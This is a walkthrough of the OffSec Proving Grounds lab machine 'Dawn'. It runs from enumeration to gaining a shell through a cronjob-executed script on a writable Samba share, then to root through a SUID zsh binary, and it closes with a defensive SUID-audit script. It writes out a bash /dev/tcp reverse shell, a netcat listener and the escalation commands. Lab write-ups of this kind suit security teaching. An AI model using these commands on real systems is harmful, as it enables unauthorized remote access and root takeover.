This is a walkthrough of the machine Dawn from OffSec's Proving Grounds Play labs.

Machine information:

  • Level: Easy
  • Community rating: Intermediate
  • Flags: 2
  • OS: Linux
  • Vector: Samba, SUID misconfiguration

Nmap

sudo nmap -A --open -sV -sC -v -p- <IP>

Starting off with an Nmap scan, we discover the following open ports:

  • 80 - HTTP
  • 139/445 - Samba
  • 3306 - MySQL

Webapp

The web application on port 80 does not reveal anything interesting, displaying a generic "under construction" page:

To dig deeper, we will enumerate it using gobuster:

gobuster dir -u http://<IP>/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -t 64

We get a hit on /logs, which is an open directory containing four log files.

The only accessible log file is management.log, so we can download it to take a closer look.

wget http://<IP>/logs/management.log

The file contains logs from pspy - a process monitoring tool. Scrolling down a bit, we discover what appears to be a cronjob executing the following commands every minute:

Samba

We will briefly take a detour to enumerate Samba, first listing what shares are available using smbclient:

smbclient -L \\\\<IP>\\

We can see the same share, ITDEPT, from which the cronjob executes product-control and web-control.

Initial access

Since the cronjob will execute these files, and we have access to the share, we will start off by creating a simple reverse shell.

web-control:

#!/bin/bash
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

Next, we will start a listener to catch the shell:

nc -lvnp <PORT>

And finally, we will connect to the ITDEPT share, and upload web-control:

smbclient \\\\<IP>\\ITDEPT

put web-control

Within a minute, we receive a shell as www-data, and can read the first local.txt flag:

Privilege escalation

Using manual enumeration, looking for executables with the SUID bit set, we find /usr/bin/zsh:

find / -perm -u=s -type f 2>/dev/null

Since the SUID bit makes zsh run with root's effective UID, simply launching it provides a root shell, from which we can finally read the second flag, proof.txt:

zsh
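From the defender's side, the fix here is to strip the SUID bit from any shell or interpreter, and to audit for it regularly. The following POSIX shell script is an added example (not part of the original writeup): it reads `find / -perm -u=s -type f` output and flags binaries whose name is a shell or interpreter, using a constructed sample list in place of a live scan.

```shell
#!/bin/sh
# Added example: flag SUID binaries that are shells or interpreters.
# Constructed sample of `find / -perm -u=s -type f` output, not from the lab box.
SAMPLE_SUID_LIST='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/zsh
/usr/bin/mount
/usr/local/bin/python3'

# flag_suid_shells: reads newline-separated paths on stdin and prints each one
# whose basename is a shell or interpreter. These should never carry SUID,
# because they hand the caller an interactive process with the owner's UID.
flag_suid_shells() {
  while IFS= read -r path; do
    [ -n "$path" ] || continue
    base=$(basename "$path")
    case "$base" in
      sh|bash|dash|zsh|ksh|csh|tcsh|fish|python*|perl*|ruby*|php*|node)
        printf 'SUID shell/interpreter: %s\n' "$path" ;;
    esac
  done
}

# audit_live: run the real filesystem scan and report findings (not run here).
# Remediation for a hit is `chmod u-s <path>` after confirming nothing needs it.
audit_live() {
  find / -perm -u=s -type f 2>/dev/null | flag_suid_shells
}

# Demonstrate on the constructed sample; both zsh and python3 are reported.
printf '%s\n' "$SAMPLE_SUID_LIST" | flag_suid_shells
```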
